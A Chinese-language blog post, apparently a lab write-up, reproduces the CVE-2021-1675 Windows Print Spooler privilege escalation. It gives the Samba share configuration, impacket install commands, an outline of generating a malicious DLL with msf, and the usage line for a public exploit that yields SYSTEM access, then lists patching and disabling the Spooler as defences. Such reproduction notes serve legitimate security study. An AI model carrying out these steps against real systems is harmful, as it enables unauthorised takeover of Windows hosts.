CVE-2021-1675 Windows Print Spooler权限提升漏洞复现
前言
本文内容是作者在平时漏洞复现时记录的笔记,内容参考了前辈的经验,如有侵权请联系我及时进行删除。
环境搭建
攻击机:Kali Linux (ip:192.168.18.131)
靶机:Windows Server 2016 (ip:192.168.18.134)
-
Kali开启SMB匿名访问,靶机需能够正常进行访问
systemctl start smbd
systemctl start nmbd
mkdir -p /home/yuhzha/share
chmod 777 /home/yuhzha/share/
vim /etc/samba/smb.conf
ps:在使用github作者提供的配置时总会报错,我将其修改为以下内容才能复现成功,结尾会提供原项目地址。
[global]
workgroup = WODGROUP
security = user
passdb backend = tdbsam
printing = cups
printcap name = cups
load printers = yes
cups options = raw
map to guest = bad user
[share]
comment = my first samba-file
path = /home/yuhzha/share
browseable = yes
public = yes
writable = yes
systemctl restart smbd
systemctl restart nmbd
2. Kali安装impacket
pip3 uninstall impacket
git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py install
复现过程
复现过程
1.在共享文件夹内使用msf生成dll
2.使用msf启动监听
3.使用EXP进行攻击(EXP在参考链接中的github项目里)
使用格式:python3 CVE-2021-1675.py 靶机账号:靶机密码@靶机ip ‘生成的dll地址’
报错不影响结果
成功利用,权限为system。
防御措施
-
升级系统,目前微软官方已针对支持的系统版本发布了修复该漏洞的安全补丁。
-
禁用Print Spooler服务。
参考链接
https://github.com/cube0x0/CVE-2021-1675
https://www.cnblogs.com/itwangqiang/p/13413894.html
来源:freebuf.com 2021-07-08 18:18:16 by: Yuhzha
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
请登录后发表评论
注册